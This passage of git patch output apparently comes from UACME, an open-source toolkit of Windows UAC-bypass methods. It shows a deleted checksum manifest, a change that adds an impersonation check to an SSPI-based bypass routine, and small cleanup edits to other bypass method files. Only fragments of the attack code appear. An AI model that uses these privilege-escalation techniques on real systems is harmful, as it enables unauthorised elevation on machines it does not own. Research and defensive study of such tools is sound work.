dlls. * @@ -1190,7 +1190,7 @@ LPWSTR ucmQueryRuntimeInfo( PROCESS_BASIC_INFORMATION pbi; PROCESS_EXTENDED_BASIC_INFORMATION pebi; - PSYSTEM_PROCESSES_INFORMATION ProcessList, pList; + PSYSTEM_PROCESS_INFORMATION ProcessList, pList; LSA_OBJECT_ATTRIBUTES lobja; LSA_HANDLE PolicyHandle = NULL; @@ -1240,7 +1240,7 @@ LPWSTR ucmQueryRuntimeInfo( RtlSecureZeroMemory(szBuffer, sizeof(szBuffer)); bFound = FALSE; - ProcessList = (PSYSTEM_PROCESSES_INFORMATION)ucmGetSystemInfo(SystemProcessInformation); + ProcessList = (PSYSTEM_PROCESS_INFORMATION)ucmGetSystemInfo(SystemProcessInformation); if (ProcessList) { pList = ProcessList; @@ -1261,7 +1261,7 @@ LPWSTR ucmQueryRuntimeInfo( if (pList->NextEntryDelta == 0) { break; } - pList = (PSYSTEM_PROCESSES_INFORMATION)(((LPBYTE)pList) + pList->NextEntryDelta); + pList = (PSYSTEM_PROCESS_INFORMATION)(((LPBYTE)pList) + pList->NextEntryDelta); } ucmxHeapFree(ProcessList); } diff --git a/UACME.sha256 b/UACME.sha256 deleted file mode 100644 index 00ad8f4..0000000 --- a/UACME.sha256 +++ /dev/null @@ -1,166 +0,0 @@ -3c798c460e6179530b090042b26cc9953e7129f95f1cdd4cef0ab8c441779557 *Bin\.empty -3655d61903d6fc9e1ce90a38d318ea547fd20772ebb4eecf0eff333cd933f646 *Source\README.md -9ccf0c8c7eef918c9dd7b89dd94f0dfa7dc8779b1f9e862908b09b47b75f7d1f *Source\uacme.sln -73d30bd3b8d21a552b8b0c00a7412120db13b3ce0ce8884ed270842863b01a36 *Source\Akagi\aic.c -b12885f92d7691b2823d2b921b7dda440cbcc4c6aa5a3b7c3e9e6f7af4772397 *Source\Akagi\aic.h -8172069709954a5616b75306e565cbc5cd5baada00c15cba084420e61bebcdaf *Source\Akagi\akagi.ico -02238b1720b8514de36ae80fa3d07c377d22e6befe99a7b87d4da9d60d23be02 *Source\Akagi\akagi.manifest -9434096968402430d1ace03ffbb13ba28c2e4fcb23e59ed353eac70aa02b5b25 *Source\Akagi\bin32res.h -3f399d7d08d61d4ab7d5188e893b0f2a06b5a5a00f0ce00db2d234463280540c *Source\Akagi\bin32res.rc -e732850b9f1b5432e5e75ac1ff4312f65e283ee9833b45b390633ea21a99b94a *Source\Akagi\bin64res.h -5d1fc31a7caf39f1c766e15fb64d44f1417d3b6f2fe389f3e104218050c3746a *Source\Akagi\bin64res.rc -8776cfacd0e7e409a5f5168261089e6386eeffacedc9158c19d86dfc78e0dc61 *Source\Akagi\compress.c -f648515a31961e39a4395e42689b3fba1f86e0b4a724361c4ea383f50098556c *Source\Akagi\compress.h -9209af6bfe87a818df00297bed5517be70c1d931523b71e25813365699df749a *Source\Akagi\console.c -5994c2c930bf095841520a4e6859511485f6ad0eec0d660392462402c781a6ba *Source\Akagi\console.h -273987ab3fcc9a7e9976a73ff8c6986e6e397fc3b9f179ce23991814f694a843 *Source\Akagi\encresource.h -f243a7dcea8584d55890ae0b2e01c1137b923ae6ea9bdd8ae97c14f9da79b788 *Source\Akagi\fusutil.c -eeddce39694b2f054aa86a7c37b2b56427209f775d27438a9427410550a2740b *Source\Akagi\fusutil.h -4390571ef12a934fbfc0191b789a48c8e61f690ba930f4659f3960e4ec22706a *Source\Akagi\global.h -f0432754020470baca5728aa59790267492406f847c1210fc6f1ba1b1466047b *Source\Akagi\main.c -9bd3b7a206ced26ce5e03a4002bbd41e4f57b8c8c9ce4467f54221ad68e55a58 *Source\Akagi\makecab.c -bd7f1ebd11ed2313bef81c4701b2444ab37d9723493bfeb9de5db2063a5213e2 *Source\Akagi\makecab.h -c90cec4c10cde815fd286d83601b4cd3738097e8e0b2e592dc28c1325c12918d *Source\Akagi\resource.h -b289e30ce698eb0402babc2788ac7022b6a7db161296182e0e13fd021a3bee03 *Source\Akagi\Resource.rc -7be72ada31cc042e7dea712308f59235516a6ae1d434b24645cd4726a12b5d64 *Source\Akagi\stub.c -b1b79e79880d60412e41d43b5e9ef936fdb3e66ad85e47fc0e1261ed07322d06 *Source\Akagi\stub.h -215a9f9095e89c79b342aed5625bbc6d660b910cd15a06ac4a072e8860c3e2c6 *Source\Akagi\sup.c -695f6fc13c134fb9506720ff19b403a4cbeab39888c7eaaebc1adc51ed23881a *Source\Akagi\sup.h -e6b96e43c3a1a8de682f16086ea8639cfe4649092fc2f47e26fb5baa42a70caf *Source\Akagi\uacme.vcxproj -fa20d8ff56109734866c6baed5d8be316d4d24a5dbf074e0e90d7e458978de1c *Source\Akagi\uacme.vcxproj.filters -e7cb9e5eaca549d918f5f048f55cf67c46e745aeccebc578eb848e46c1915719 *Source\Akagi\uacme.vcxproj.user -05a2c8c165e431e852c4bcafbfccb27b9e8c0428d2c975ceef94c98639f1c7d8 *Source\Akagi\uas.h -750326700ffeeac7f34aa111af345fec1c221f519347e57e35b96454fcc044f6 *Source\Akagi\appinfo\appinfo.acf -2a63a2c3f43afb1f3fb091ffa71bd4d67b64e6d0b220e97057542883bce246f5 *Source\Akagi\appinfo\appinfo.idl -7e8e77d67c76bdf7bf34f0aef7cb3f18f51efb0b2ab20ffe600240824331986e *Source\Akagi\appinfo\x64\appinfo64.c -9c71ab720c5589739b70ecd7f5bae0bb6ab2ac043bac1a24aec50864f3037719 *Source\Akagi\appinfo\x64\appinfo64.h -48da9c5487412fa708a6d7fb753a238a9258fd1bad88d564ad07178d278a7b8d *Source\Akagi\appinfo\x86-32\appinfo32.c -282383cd8223cd0d36f4bf09501830ae1dd01aacaf483e9e95fa4938345453b7 *Source\Akagi\appinfo\x86-32\appinfo32.h -e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 *Source\Akagi\bin\Akatsuki64.cd -e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 *Source\Akagi\bin\Fubuki32.cd -e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 *Source\Akagi\bin\Fubuki64.cd -e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 *Source\Akagi\bin\Kamikaze.cd -e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 *Source\Akagi\bin\secrets32.bin -e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 *Source\Akagi\bin\secrets64.bin -dd310c7a9d558083387ae42d137624df205051094b619f59edf7899af42104c8 *Source\Akagi\methods\api0cradle.c -10f5885eb8ecc5ecbbea6717ba163761b34a416c7beff36276e7b590f39161b9 *Source\Akagi\methods\azagarampur.c -574a8de72c4661a520afbcdbe4580335203d0f1b9da5d9ba3659d30d02b89466 *Source\Akagi\methods\comsup.c -7565529119639cd275dc65b5290ad98bf4f4178f98d0b55368d337227c9ef085 *Source\Akagi\methods\comsup.h -cb1bf87f2976eb49c5560b16a69c742b39706c48314bcc0bdeeaf545910bd380 *Source\Akagi\methods\dwells.c -2e64396f0b5cc2f6e59f5d329ffbb1ef0e6dd5e0547bd6fff5567f72cca6ace9 *Source\Akagi\methods\elvint.h -49d94561eee009acc25c36857bb0260dd8d8a38e6cdf0286a49463d90724b9b1 *Source\Akagi\methods\hakril.c -5c96d6754fab5329173536f2a4b29997c1661927f28b9ddcb091e4652e0bb014 *Source\Akagi\methods\hybrids.c -23af06a7987966a7e51336b3cdd33b411fa05778ec14179a50a60fa0f6aee1af *Source\Akagi\methods\methods.c -44c2e8c3e25b9d75d319a256eaaca3d195d789209a6491795696b5e33b142513 *Source\Akagi\methods\methods.h -bbcd54496dca975abf6089526023446984238d464e2df7485230b76072ff2ea1 *Source\Akagi\methods\rinn.c -8d41849fa260b5a4a6a05db8312b60b3f6f2b5efe4f4d4fdd05c70701c7aabed *Source\Akagi\methods\routines.h -c204e44cffb51d95128971ec8b31e668e3b4f50ba3f4082c36ced76c2b30bc63 *Source\Akagi\methods\shellsup.c -87a210d7a7ed8cd635437bfe6d79bd9ee9ca8d6ef9079f9b30b4162e3843ad37 *Source\Akagi\methods\tyranid.c -207953846cc26417e163db3dc483a65e8e94bc9bd86c8928d59b078f1e72fcc7 *Source\Akagi\methods\wusa.c -4d870a821d4104536f0ae7d1920748e9a6ea2dc828103470516a9a2f0b9601ff *Source\Akagi\methods\zcgonvh.c -4c21f433ebb3a72668a36a707daed37afb5c3ed2402d60b1634a741c36f2ed10 *Source\Akagi\pcasvc\w7\pcasvc7.acf -f3900a5064d5ec0c58e1da8f1a83b1cd84bab30ac4d79737cd74ada3803de0f8 *Source\Akagi\pcasvc\w7\pcasvc7.idl -0c6faff9d363f76f723c52ae8796bf7d37913c7117eaaeb9416728ca958975d4 *Source\Akagi\pcasvc\w7\x64\pcasvc7_64.c -421ccf38c0f8216c69a74bb9f0ff4a08dae88c02958829c104198b9bca715bcb *Source\Akagi\pcasvc\w7\x64\pcasvc7_64.h -62cb177a65b5ac7e84d6619e16004424182d79c5f5f3dbc5f40c15f63aa089fa *Source\Akagi\pcasvc\w7\x86-32\pcasvc7_32.c -53b83ef74e74ea230eeb916254753d886e8ec04e09cd8823af9f94660bdbc43b *Source\Akagi\pcasvc\w7\x86-32\pcasvc7_32.h -47c05b996b2831e39c05190b62fb25558a8a05173eb4b5f5b263b841e0bed3f2 *Source\Akagi\pcasvc\w8_10\pcasvc.acf -beb7d48597345d0109ce51c7452292ba6e970eb8ed5f716ec035087aa3f045b3 *Source\Akagi\pcasvc\w8_10\pcasvc.idl -10b06fce5935839c3978cd7fe130355be750cfa03986adff5c33bd9f7922871e *Source\Akagi\pcasvc\w8_10\x64\pcasvc64.c -2ee6204d65c00011c64b84383bfd8a3dc04149ff681df8ee86acbbea4ba73aa1 *Source\Akagi\pcasvc\w8_10\x64\pcasvc64.h -5a27534e0361dc8dce940b8732c306443af9944e23aaac6865131e1eb7570687 *Source\Akagi\pcasvc\w8_10\x86-32\pcasvc32.c -5adad6349711b6f30ce8f37c24b7db4201c2002b7b2fec5093f81e1c3c50761f *Source\Akagi\pcasvc\w8_10\x86-32\pcasvc32.h -a3bc28e48c61afe31a0c986674ac145e773d616b2fafb49a090d50cc26ea4479 *Source\Akagi\tests\test.c -df64a3f4eb1348cba026ff85a86f39e11a979ce50a4b4af0b9cbd2acdfc90bf0 *Source\Akagi\tests\test.h -e3f9f33e0223371b74d1ce7049a52675ea7a7086f1901b753db3cd9c187246b2 *Source\Akatsuki\Akatsuki.vcxproj -4a548ba1be4de75a03af674d670ff10375700a18babc7cb3a4d1406045e2df04 *Source\Akatsuki\Akatsuki.vcxproj.filters -9a4b0023e443b33d85280eedb510864c42b4146c8e6e5f742444b3eff0aae55f *Source\Akatsuki\Akatsuki.vcxproj.user -6c1434ff461372f8c6458ef072a32da96fc76f69f97f46fd975742b2ab5baa13 *Source\Akatsuki\dllmain.c -bbce2e4fa4cbb392974e7276108f1f9091f31e806a2c81964c996953e0770125 *Source\Akatsuki\export.def -4006ba7005ca2873a5acbd2755ba1965e62bf0bd8783882f874bea2c80d45e1d *Source\Akatsuki\resource.h -6e738ced2705ddee02d2040d9c7c0b9e57e16758f44faa0d855975f1b5b6d3d5 *Source\Akatsuki\version.rc -da50f691771c3694ae8821095113a29cf3333e728a31a56f25d08c1a43c9e173 *Source\Fubuki\atldll.h -12372473c8b8cc25108b254a5ed994ee3895687236f8ad062006c1d8f6916475 *Source\Fubuki\dll.vcxproj -7180e3ad80a06a52e84d9b530b7a27016f7dd20842d832726c96366e399ee85a *Source\Fubuki\dll.vcxproj.filters -f0b8b0d1d5b85c4324c8cbb21d94dd8db69fd21bb5e37491bbd6aa2297fa0fc7 *Source\Fubuki\dll.vcxproj.user -912bbb35787c58046da31f1608d07a68753fa4bd8782e29ef80eb51e65e887d2 *Source\Fubuki\dllmain.c -195a6712e204e1d01dc1d36b9d43a2a477b0833019294b37512d8baaa98e524e *Source\Fubuki\export.def -802d51a4b440e079020103c46a56967fb6e32f95188600388ef7c8b91dc746e8 *Source\Fubuki\fubuki.h -59744929cc3a6d02d9ec26cc2945b00eaa6079c32602f460558adb9e7146f824 *Source\Fubuki\pca.c -1939a69f717d4baa13d558c11e1fc7dee1e8ce8fcc5f0fe0dea11845e22ce4c8 *Source\Fubuki\pca.h -785ca1f83eab4185774f140b74d30823a69dec01ca06ccba4bfd8d1ddd3255d9 *Source\Fubuki\resource.h -4aa24c1115cc3ed71027f760c7564357c162a09de58d75b5e9037cd869fb2a8a *Source\Fubuki\uihacks.c -73e735426c5fab97a7289a7a57bc8bb21bce7b2b1995ae076c41027780ed88c9 *Source\Fubuki\uihacks.h -835798995e6df38e12ef18fdcfda6dd1bb8fdffb567a03da46ed1ab7b66a0194 *Source\Fubuki\version.rc -b419f6b7b8d24dc61e7473092a8326720ef54e1f65cc185da0c6e080c9debb94 *Source\Fubuki\winmm.h -f66280e29c2116d4b83f2c6899d8caf432f7a4d1ccc4e4cf4e72b05d0fbd1f25 *Source\Kamikaze\Kamikaze.msc -d090766c75d998b019d651fbb0c04112c6feb0f754628751682708e13baf2744 *Source\Kamikaze\Launcher.html -e54acaf84b54afaa2320803e0928ce9fbc19d8be3e8df4051b88f1b19cd836a5 *Source\Naka\main.c -4479c31a428b0672245b2eff026be202998a4f146ab90cd06ce44412a20bf462 *Source\Naka\naka.h -c4d57f02dd8276fb3df81442bda345d4c3004dfc2842b2140ac9e71b30fd743b *Source\Naka\Naka.vcxproj -175c9fc0c7046d006a6db698144fab3b40bd191e15617e7fba417a466c3a0b6f *Source\Naka\Naka.vcxproj.filters -e67d285ac080ed3a22453a79f4390dfb1b5b131569aa53a2cd2502c4b5a69221 *Source\Naka\Naka.vcxproj.user -893b90b942372928009bad64f166c7018701497e4f7cd1753cdc44f76da06707 *Source\Shared\cmdline.c -bd6fe82852c4fcdfab559defa33ea394b752a4e4a5ac0653ae20c4a94b0175ed *Source\Shared\cmdline.h -9877129f209f0c3faf146ab725442b614c49942b7b888e3aabf5903217cb0503 *Source\Shared\consts.h -01c5aada277c3a7a138ab7c31beda0decee8ec28fe7525e43ca524b2b0270213 *Source\Shared\ldr.c -b22c6d2722fa9e917746502fd4615d28b9c889d7288fc737315150e0ae40ee6f *Source\Shared\ldr.h -133f71bd8d6d4ca80a9a542c2492ba9a65e05b0cfa681a85dd05d9cf998a1bb4 *Source\Shared\libinc.h -2a08385892845104b4f07d693ca395eba3a09e4aa89ad791be3807919316ed67 *Source\Shared\minirtl.h -d7fbfd69df3840022dab1f8f2d529ce04abac8cee0234448bfd0a67feb6aea22 *Source\Shared\rtltypes.h -b7dec074f463b0be08dd3a707495e45c7a629502fa6dd7ef972a74a2aff72632 *Source\Shared\shared.h -ca0b7a38be2f3f63a69aca6da7b3a62a59fcefee92de00e9796f68d4a2a23158 *Source\Shared\strtoi.c -c51beca480d6e6f88174698503c0856c56488a59101d259c068dccb0902b01ec *Source\Shared\strtoul.c -e56e67b10a67f0d5ef4128c7ab0c6cb9ba9966916720525edfa6abf3101dfe13 *Source\Shared\u64tohex.c -4d15af5a22467795c5367c3956746d01424795784f62ca3f30e4619c063338a5 *Source\Shared\u64tostr.c -f81c975acd016c97776dd3a8e3218e148682b0336ff3fcd77fad6d9b86ddf107 *Source\Shared\ultohex.c -9cbedf9b92abaef3ea28de28dd523ac44079592178ef727c7003c339a5a54712 *Source\Shared\ultostr.c -44626fa65358f14a41bbc8c850b482f61eb64e1e0636df93320d1cca6caa0483 *Source\Shared\util.c -3fa76458e017f2d04544d809a7be81e180c3132ad2254279812e27d5d20ce97e *Source\Shared\util.h -da26a5e6b6a29023ee4ab6b54fd24ab13bebed4bcaaac910379119463bba62fa *Source\Shared\windefend.c -be93e59137554e3f45e8c6fbc22f0fbe42a1dfa8e457e60894bfda1388d61a1e *Source\Shared\windefend.h -c1405b280bacc7566ccd041a74461de3f8496128fd71e39368905cf8d95268f6 *Source\Shared\_filename.c -9e3f1386bfb64dbaa3cbb12fd3bf51c734872c2fdf15cf1aaeca52a515767519 *Source\Shared\_filename.h -83772aa217508279294d91af5cfabec9b5e00b836a2e2f5fe37cf1ebc2905a52 *Source\Shared\_strcat.c -2a67c7690ec6df8e233207116b0e4fe76c02ae43595d9e606e123572b6ac88a1 *Source\Shared\_strcmp.c -ef1b18997ea473ac8d516ef60efc64b9175418b8f078e088d783fdaef2544969 *Source\Shared\_strcmpi.c -969b35213fa23ff50a169e5498a97f28bc6f5820b447b78ec9dc6910dd8cc3e8 *Source\Shared\_strcpy.c -27159b8ff67d3f8e6c7fdb4b57b9f57f899bdfedf92cf10276269245c6f4e066 *Source\Shared\_strend.c -60f19c6b805801e13824c4d9d44748da8245cd936971411d3d36b873121888eb *Source\Shared\_strlen.c -97e0720ed22d2d99e8148aab7ab2cb2cc3df278225669828b2d8d4d9ef856d94 *Source\Shared\_strncmp.c -87cc72bb8e3f1534bee09ee278ecd928d975ebb94aeffc767b67249815a0bf3a *Source\Shared\_strncmpi.c -0434d69daa20fbf87d829ffc17e43dcc2db3386aff434af888011fdec2f645a4 *Source\Shared\_strncpy.c -52a696ae714eb81033c477d1ec6c01389eef56c847609e89d360c2fb6899b4b6 *Source\Shared\_strstri.c -16726c4330d7db5d56a5a11503314533b170783441c3f8282b66f126295a289e *Source\Shared\hde\hde64.c -e99aa4997bda14b534c614c3d8cb78a72c4aca91a1212c8b03ec605d1d75e36e *Source\Shared\hde\hde64.h -f8e6a0be357726bee35c7247b57408b54bb38d94e8324a6bb84b91c462b2be30 *Source\Shared\hde\pstdint.h -b774446d2f110ce954fb0a710f4693c5562ddbd8d56fe84106f2ee80db8b50a2 *Source\Shared\hde\table64.h -1424fde08d6994062fc8a795ff8d80d30060c4991103c4af59228dcf60171eca *Source\Shared\ntos\ntbuilds.h -fb5dc2d637faab73729d65323fcc7d4b7edf43bf9f3de8d8e65ea55670229815 *Source\Shared\ntos\ntos.h -cef0c644e3203b086519fbb77ccc50589b59d5b9a44adfb72a7f2bc6924e9878 *Source\Shared\ntos\ntsxs.h -fa0df73ca48d6e73c1e57b6630d09ec86f04f9a1f8cfaec88d7938b2d97403ef *Source\Yuubari\appinfo.c -82928d0a1d3263a9676b6587feba86e1716c1a2c20294c6c2210d4557975ff69 *Source\Yuubari\appinfo.h -46ce4d9e34f8845b17c5a9b87891b5ace6dca83427377029ee1d06af5af6d637 *Source\Yuubari\basic.c -10979d6665292065b840f8d95366201a686146e949908cdd41331699b331ab9c *Source\Yuubari\basic.h -c0ddb8ed4e267153cd7fd2fb858e0a18fd8fa88ddc3f748bcee35372f41bec46 *Source\Yuubari\comobj.c -5b20f14c3b8322a354bf374d9cb463359c57d07f4031d788c7bc88bda6f833ee *Source\Yuubari\comobj.h -6290ab47924ca529c75a3598e7fe6ccf121f1aac4eb7035bf65895cbab9c6ab0 *Source\Yuubari\consts.h -27b89ba25c1620f7f46af4a239d6a18b71b9b689ea33eb7ab099e0b039cdf21f *Source\Yuubari\cui.c -3058dea6894b1ca7bcff8896b35080c0ddfa1c541e7e505792cbac65dea9d0d9 *Source\Yuubari\cui.h -6d40ed8b3a8d33fcfff627ead344afb1fda7f76099cb8ee4135ff1c8216e94f6 *Source\Yuubari\fusion.c -0da59496e173b30d19c4f6c3ca62f2be8ef5b5e790c4952ac0d27f987577488f *Source\Yuubari\fusion.h -ba8fe35020bcd560c0f100bda43c2311bfdbb97aafbe367ac5077cebca59287f *Source\Yuubari\global.h -56843f0410f4c97e8d0809bf7fe4c3e7efaf0dcefd595da58da07794d1709f27 *Source\Yuubari\logger.c -9b9dad8b40daf87f796c91a0538198921acebd13d47515e0e27b18eaad6906f4 *Source\Yuubari\logger.h -0041d09d62db1cfe06bcb45c6b007af3b6d8c6cb419948e49141188f453a329b *Source\Yuubari\main.c -76faa46729e53c1204c1c6f4d51d9a0c2701cca1f7e927249cfb0bce71e60022 *Source\Yuubari\resource.h -ea23a31a0ec1fa3ae2ff1a0bad75421cbd8d74bcfbb7abd2749eb625c918b518 *Source\Yuubari\Resource.rc -2aa21c51a100de781b6647b04bb0371a6205a7b1dc22a3eeae058ec4cb80fd5f *Source\Yuubari\sup.c -e333ccfe9c22eab91abd3ca224c70741e8619bb00353ea3bc4ea9d9f007cdf85 *Source\Yuubari\sup.h -e0be14373098896893f34e02dfe84d3eb64e11d9d9f7f70a15101b41cf9ae5bd *Source\Yuubari\wintrustex.h -d4acf557a541579d5a8992b9514169fc05c40f26144ad8a560d8ef8d0a3cce0e *Source\Yuubari\yuubari.ico -8ac147d1db55cbfaaa3a7cd3c7ae1da147c9add049e8150dab26609a22a53a10 *Source\Yuubari\Yuubari.vcxproj -ff3f6b103b45ea48c5fa447854a35950378ce7558868d4975fd5b11202d0a991 *Source\Yuubari\Yuubari.vcxproj.filters -f41690990d738d243f75d60ffe7a585027c0b379735b7d9d6df9cba7c7ad4c2c *Source\Yuubari\Yuubari.vcxproj.user -ccac7cdcbd419f3184c3886f5c36669ff9f7714b57a1249e2bb4be07b492c8ac *Source\Yuubari\tests\test_fusion.c -8f25cacb678c008ff3f205dc9d66f4411902b867df8656ea758c0c6d2141e18f *Source\Yuubari\tests\test_fusion.h From 7b03d2bea93d4b94c73f77a1ac502765121bc36d Mon Sep 17 00:00:00 2001 From: hfiref0x Date: Tue, 26 Sep 2023 06:45:50 +0700 Subject: [PATCH 2/4] v 3.6.5 Enable impersonation level check. --- Source/Akagi/methods/antonioCoco.c | 23 ++++++++++++++++------- 1 file changed, 16 insertions(+), 7 deletions(-) diff --git a/Source/Akagi/methods/antonioCoco.c b/Source/Akagi/methods/antonioCoco.c index 4c144e4..d2949da 100644 --- a/Source/Akagi/methods/antonioCoco.c +++ b/Source/Akagi/methods/antonioCoco.c @@ -2,7 +2,7 @@ * * (C) COPYRIGHT AUTHORS, 2023 * -* TITLE: antonioCoco.C +* TITLE: ANTONIOCOCO.C * * VERSION: 3.65 * @@ -822,7 +822,8 @@ NTSTATUS ucmSspiDatagramMethod( _In_ DWORD ProxyDllSize ) { - BOOL bNeedCleanup = FALSE; + BOOL bNeedCleanup = FALSE, bImpersonate = FALSE; + SECURITY_IMPERSONATION_LEVEL impLevel; NTSTATUS MethodResult = STATUS_ACCESS_DENIED; HANDLE hToken = NULL; WCHAR szLoaderFileName[MAX_PATH * 2]; @@ -856,16 +857,24 @@ NTSTATUS ucmSspiDatagramMethod( if (!bNeedCleanup) break; - if (ImpersonateLoggedOnUser(hToken)) { + bImpersonate = ImpersonateLoggedOnUser(hToken); + if (!bImpersonate) + break; - if (ucmxInvokeCreateSvcRpcMain(szLoaderFileName)) - MethodResult = STATUS_SUCCESS; + if (!supGetThreadTokenImpersonationLevel(NtCurrentThread(), &impLevel)) + break; - RevertToSelf(); - } + if (impLevel < SecurityImpersonation) + break; + + if (ucmxInvokeCreateSvcRpcMain(szLoaderFileName)) + MethodResult = STATUS_SUCCESS; } while (FALSE); + if (bImpersonate) + RevertToSelf(); + if (hToken) CloseHandle(hToken); From bcaba3abd25038a6ae776c75e452968c2d99f553 Mon Sep 17 00:00:00 2001 From: hfiref0x Date: Tue, 26 Sep 2023 19:19:51 +0700 Subject: [PATCH 3/4] v 3.6.5 Cleanup. --- Source/Akagi/methods/azagarampur.c | 6 +----- Source/Akagi/methods/hybrids.c | 6 +++--- Source/Akagi/methods/methods.c | 3 ++- Source/Akagi/methods/rinn.c | 9 ++++----- Source/Akagi/methods/shellsup.c | 9 ++++----- Source/Akagi/sup.c | 5 +++-- Source/Shared/consts.h | 1 - 7 files changed, 17 insertions(+), 22 deletions(-) diff --git a/Source/Akagi/methods/azagarampur.c b/Source/Akagi/methods/azagarampur.c index 46dc511..4919c07 100644 --- a/Source/Akagi/methods/azagarampur.c +++ b/Source/Akagi/methods/azagarampur.c @@ -408,8 +408,6 @@ NTSTATUS ucmIeAddOnInstallMethod( _strcpy(szDummyTarget, g_ctx->szSystemDirectory); _strcat(szDummyTarget, CONSENT_EXE); - r = E_FAIL; - // // Verify image embedded signature. // Uppon success copy given file to the temporary directory and return full filepath. @@ -430,9 +428,7 @@ NTSTATUS ucmIeAddOnInstallMethod( &dummy, &dummyPtr); - if (dummyPtr) - CoTaskMemFree(dummyPtr); - + CoTaskMemFree(dummyPtr); SysFreeString(fileToVerify); } diff --git a/Source/Akagi/methods/hybrids.c b/Source/Akagi/methods/hybrids.c index c7cd506..d32fe2b 100644 --- a/Source/Akagi/methods/hybrids.c +++ b/Source/Akagi/methods/hybrids.c @@ -4,9 +4,9 @@ * * TITLE: HYBRIDS.C * -* VERSION: 3.64 +* VERSION: 3.65 * -* DATE: 04 Feb 2023 +* DATE: 25 Sep 2023 * * Hybrid UAC bypass methods. * @@ -1275,7 +1275,7 @@ NTSTATUS ucmDotNetSerialMethod( } while (FALSE); - if (lpAppData) CoTaskMemFree(lpAppData); + CoTaskMemFree(lpAppData); if (lpTargetPath) { DeleteFile(lpTargetPath); supHeapFree(lpTargetPath); diff --git a/Source/Akagi/methods/methods.c b/Source/Akagi/methods/methods.c index c5c4eab..583f423 100644 --- a/Source/Akagi/methods/methods.c +++ b/Source/Akagi/methods/methods.c @@ -66,7 +66,8 @@ ULONG UCM_WIN32_NOT_IMPLEMENTED[] = { UacMethodCurVer, UacMethodVFServerTaskSched, UacMethodVFServerDiagProf, - UacMethodAtlHijack + UacMethodAtlHijack, + UacMethodSspiDatagram }; UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = { diff --git a/Source/Akagi/methods/rinn.c b/Source/Akagi/methods/rinn.c index 8911d8e..e193044 100644 --- a/Source/Akagi/methods/rinn.c +++ b/Source/Akagi/methods/rinn.c @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2018 - 2022 +* (C) COPYRIGHT AUTHORS, 2018 - 2023 * * TITLE: RINN.C * -* VERSION: 3.61 +* VERSION: 3.65 * -* DATE: 22 Jun 2022 +* DATE: 25 Sep 2023 * * FBK UAC bypass methods. * @@ -152,8 +152,7 @@ NTSTATUS ucmEditionUpgradeManagerMethod( if (bEnvSet) supSetEnvVariable(TRUE, NULL, T_WINDIR, NULL); - if (lpGuidDir) - CoTaskMemFree(lpGuidDir); + CoTaskMemFree(lpGuidDir); supWaitForGlobalCompletionEvent(); diff --git a/Source/Akagi/methods/shellsup.c b/Source/Akagi/methods/shellsup.c index 1e31ec7..39b3a1a 100644 --- a/Source/Akagi/methods/shellsup.c +++ b/Source/Akagi/methods/shellsup.c @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2016 - 2021 +* (C) COPYRIGHT AUTHORS, 2016 - 2023 * * TITLE: SHELLSUP.C * -* VERSION: 3.57 +* VERSION: 3.65 * -* DATE: 01 Nov 2021 +* DATE: 25 Sep 2023 * * Shell registry hijack autoelevation methods. * @@ -121,8 +121,7 @@ NTSTATUS ucmxCreateSlaveKey( } while (FALSE); - if (lpGuidKey) - CoTaskMemFree(lpGuidKey); + CoTaskMemFree(lpGuidKey); return ntStatus; } diff --git a/Source/Akagi/sup.c b/Source/Akagi/sup.c index 6ef1a39..c7cffde 100644 --- a/Source/Akagi/sup.c +++ b/Source/Akagi/sup.c @@ -6,7 +6,7 @@ * * VERSION: 3.65 * -* DATE: 22 Sep 2023 +* DATE: 25 Sep 2023 * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED @@ -932,7 +932,8 @@ NTSTATUS supLdrQueryResourceDataEx( IMAGE_RESOURCE_DATA_ENTRY* DataEntry; ULONG SizeOfData = 0; - *DataSize = 0; + if (DataSize) + *DataSize = 0; if (DllHandle == NULL) { return STATUS_INVALID_PARAMETER_2; diff --git a/Source/Shared/consts.h b/Source/Shared/consts.h index 678bc0a..f9a2851 100644 --- a/Source/Shared/consts.h +++ b/Source/Shared/consts.h @@ -50,7 +50,6 @@ #define AKAGI_COMPLETION_EVENT_ID 'ab' #define AKAGI_SHARED_SECTION_ID 'cd' #define AKAGI_BDESCRIPTOR_NAME_ID 'ef' -#define AKAGI_RPC_SVC 'zz' #define FUBUKI_SYNC_MUTEX_ID 'a1' #define FUBUKI_PCA_SECTION_ID '0f' #define FUBUKI_PCA_EVENT_ID '1f' From 33b22791d3f9d9d0f7cdcc854102ed8f95c42726 Mon Sep 17 00:00:00 2001 From: hfiref0x Date: Tue, 26 Sep 2023 19:27:56 +0700 Subject: [PATCH 4/4] Fix build --- Source/Yuubari/consts.h | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Source/Yuubari/consts.h b/Source/Yuubari/consts.h index 986a66d..85862c3 100644 --- a/Source/Yuubari/consts.h +++ b/Source/Yuubari/consts.h @@ -6,7 +6,7 @@ * * VERSION: 1.54 * -* DATE: 02 Dec 2022 +* DATE: 25 Sep 2023 * * Global consts definition file. * @@ -19,7 +19,7 @@ #pragma once #define YUUBARI_MIN_SUPPORTED_NT_BUILD NT_WIN7_RTM -#define YUUBARI_MAX_SUPPORTED_NT_BUILD NTX_WIN11_ADB +#define YUUBARI_MAX_SUPPORTED_NT_BUILD NT_WIN11_24H2 #define T_UAC_COM_AUTOAPPROVAL_LIST TEXT("SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\UAC\\COMAutoApprovalList") //RS1+ #define T_UAC_BROKER_APPROVAL_LIST TEXT("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CloudExperienceHost\\Broker\\ElevatedClsids")